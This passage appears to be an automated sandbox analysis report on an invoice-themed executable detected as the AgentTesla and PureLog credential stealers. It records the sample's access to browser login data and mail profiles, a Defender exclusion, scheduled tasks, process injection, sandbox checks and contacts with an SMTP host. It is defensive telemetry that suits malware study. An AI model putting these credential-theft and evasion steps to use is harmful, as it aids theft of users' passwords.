                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Users\user\Desktop\TT Invoice copy.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Users\user\AppData\Roaming\pUAQmWA.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Users\user\AppData\Roaming\pUAQmWA.exe VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                        Stealing of Sensitive Information

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2888895822.000000000334B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2889363476.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2889363476.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: TT Invoice copy.exe PID: 6716, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: TT Invoice copy.exe PID: 7508, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: pUAQmWA.exe PID: 7612, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: pUAQmWA.exe PID: 7896, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: TT Invoice copy.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.TT Invoice copy.exe.330000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1633307056.0000000000332000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, type: DROPPED
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                        Source: C:\Users\user\AppData\Roaming\pUAQmWA.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                        Source: Yara matchFile source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: TT Invoice copy.exe PID: 6716, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: TT Invoice copy.exe PID: 7508, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: pUAQmWA.exe PID: 7612, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: pUAQmWA.exe PID: 7896, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Yara detected AgentTesla
                        Source: Yara matchFile source: 13.2.pUAQmWA.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a4c0e0.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.36d1c88.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.370d0a8.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a10cc0.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.370d0a8.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 9.2.pUAQmWA.exe.36d1c88.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a10cc0.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.TT Invoice copy.exe.3a4c0e0.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.2889363476.0000000002CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2888895822.0000000003301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2888895822.000000000334B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2889363476.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2889363476.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: TT Invoice copy.exe PID: 6716, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: TT Invoice copy.exe PID: 7508, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: pUAQmWA.exe PID: 7612, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: pUAQmWA.exe PID: 7896, type: MEMORYSTR
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: TT Invoice copy.exe, type: SAMPLE
                        Source: Yara matchFile source: 0.0.TT Invoice copy.exe.330000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000000.1633307056.0000000000332000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\pUAQmWA.exe, type: DROPPED

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
                        Windows Management Instrumentation                        		1
                        DLL Side-Loading                        		1
                        DLL Side-Loading                        		11
                        Disable or Modify Tools                        		1
                        OS Credential Dumping                        		1
                        File and Directory Discovery                        		Remote Services11
                        Archive Collected Data                        		1
                        Ingress Tool Transfer                        		Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job                        		1
                        Scheduled Task/Job                        		111
                        Process Injection                        		1
                        Deobfuscate/Decode Files or Information                        		1
                        Input Capture                        		24
                        System Information Discovery                        		Remote Desktop Protocol1
                        Data from Local System                        		1
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                        Scheduled Task/Job                        		3
                        Obfuscated Files or Information                        		Security Account Manager1
                        Query Registry                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                        Software Packing                        		NTDS531
                        Security Software Discovery                        		Distributed Component Object Model1
                        Input Capture                        		2
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        DLL Side-Loading                        		LSA Secrets1
                        Process Discovery                        		SSHKeylogging12
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Masquerading                        		Cached Domain Credentials151
                        Virtualization/Sandbox Evasion                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items151
                        Virtualization/Sandbox Evasion                        		DCSync1
                        Application Window Discovery                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                        Process Injection                        		Proc Filesystem1
                        System Network Configuration Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1426712 Sample: TT Invoice copy.exe Startdate: 16/04/2024 Architecture: WINDOWS Score: 100 45 us2.smtp.mailhostbox.com 2->45 47 ip-api.com 2->47 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus / Scanner detection for submitted sample 2->57 59 18 other signatures 2->59 9 TT Invoice copy.exe 7 2->9         started        13 pUAQmWA.exe 5 2->13         started        signatures3 process4 file5 41 C:\Users\user\AppData\Roaming\pUAQmWA.exe, PE32 9->41 dropped 43 C:\Users\user\AppData\Local\...\tmp3165.tmp, XML 9->43 dropped 61 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->61 63 Adds a directory exclusion to Windows Defender 9->63 65 Injects a PE file into a foreign processes 9->65 15 powershell.exe 23 9->15         started        18 TT Invoice copy.exe 15 2 9->18         started        21 powershell.exe 23 9->21         started        23 schtasks.exe 1 9->23         started        67 Antivirus detection for dropped file 13->67 69 Multi AV Scanner detection for dropped file 13->69 71 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 13->71 73 Machine Learning detection for dropped file 13->73 25 pUAQmWA.exe 13->25         started        27 schtasks.exe 13->27         started        signatures6 process7 dnsIp8 75 Loading BitLocker PowerShell Module 15->75 29 conhost.exe 15->29         started        31 WmiPrvSE.exe 15->31         started        49 ip-api.com 208.95.112.1, 49733, 49737, 80 TUT-ASUS United States 18->49 51 us2.smtp.mailhostbox.com 208.91.198.143, 49734, 49738, 587 PUBLIC-DOMAIN-REGISTRYUS United States 18->51 33 conhost.exe 21->33         started        35 conhost.exe 23->35         started        77 Tries to steal Mail credentials (via file / registry access) 25->77 79 Tries to harvest and steal browser information (history, passwords, etc) 25->79 37 conhost.exe 27->37         started        signatures9 process10 process11 39 conhost.exe 35->39         started       

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        TT Invoice copy.exe47%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
                        TT Invoice copy.exe51%VirustotalBrowse
                        TT Invoice copy.exe100%AviraTR/AD.GenSteal.iagga
                        TT Invoice copy.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Roaming\pUAQmWA.exe100%AviraTR/AD.GenSteal.iagga
                        C:\Users\user\AppData\Roaming\pUAQmWA.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Roaming\pUAQmWA.exe47%ReversingLabsByteCode-MSIL.Backdoor.Bladabhindi
                        C:\Users\user\AppData\Roaming\pUAQmWA.exe51%VirustotalBrowse

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        SourceDetectionScannerLabelLink
                        http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#0%URL Reputationsafe
                        https://sectigo.com/CPS00%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                        http://ocsp.sectigo.com0A0%URL Reputationsafe
                        http://www.sandoll.co.kr0%URL Reputationsafe
                        http://www.urwpp.deDPlease0%URL Reputationsafe
                        http://www.sakkal.com0%URL Reputationsafe
                        http://www.founder.com.cn/cn0%VirustotalBrowse
                        http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
                        http://www.zhongyicts.com.cn1%VirustotalBrowse
                        http://www.founder.com.cn/cn/bThe0%VirustotalBrowse

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        us2.smtp.mailhostbox.com
                        		208.91.198.143
                        		truefalse
                          		high
                          ip-api.com
                          		208.95.112.1
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://ip-api.com/line/?fields=hostingfalse
                              		high

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://www.apache.org/licenses/LICENSE-2.0TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.fontbureau.comTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designersGTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://sectigo.com/CPS0TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E9F000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2885721948.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2898221371.0000000006524000.00000004.00000020.00020000.00000000.sdmp, TT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.000000000332F000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001406000.00000004.00000020.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2885567995.0000000001432000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers/?TT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.founder.com.cn/cn/bTheTT Invoice copy.exe, 00000000.00000002.1685175816.0000000006942000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                      https://account.dyn.com/TT Invoice copy.exe, 00000000.00000002.1682284235.0000000003A10000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 00000009.00000002.1721632586.00000000036D1000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2884744372.0000000000431000.00000040.00000400.00020000.00000000.sdmpfalse
                                        		high
                                        http://us2.smtp.mailhostbox.comTT Invoice copy.exe, 00000008.00000002.2889363476.0000000002CDF000.00000004.00000800.00020000.00000000.sdmp, pUAQmWA.exe, 0000000D.00000002.2888895822.0000000003327000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
